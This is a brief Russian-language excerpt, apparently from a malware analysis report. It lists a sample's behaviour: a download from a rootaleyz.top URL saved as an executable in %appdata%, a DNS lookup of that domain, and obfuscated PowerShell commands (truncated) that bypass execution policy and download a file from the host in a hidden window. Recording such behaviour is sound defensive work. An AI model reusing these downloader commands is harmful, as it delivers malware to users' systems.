Техническая информация
- http://rootaleyz.top/read.php?f=1.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^ersh^e^ll^.exe^ -eXE^c^uT^ioNp^o^l^icY bY^Pa^s^S -n^OpRo^fIL^e ^-win^DOW^STY^LE ^h^IDDEn^ (n^ew-O^b^j^E^ct^ sYsT^EM.^n^et.W^E^bcLiEnT).d^o^WN^LOA^DFiLe^('http://rootaleyz.to...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "P^O^w^ersh^e^ll^.exe^ -eXE^c^uT^ioNp^o^l^icY bY^Pa^s^S -n^OpRo^fIL^e ^-win^DOW^STY^LE ^h^IDDEn^ (n^ew-O^b^j^E^ct^ sYsT^EM.^n^et.W^E^bcLiEnT).d^o^WN^LOA^DFiLe^('http://rootaleyz.to...' (со скрытым окном)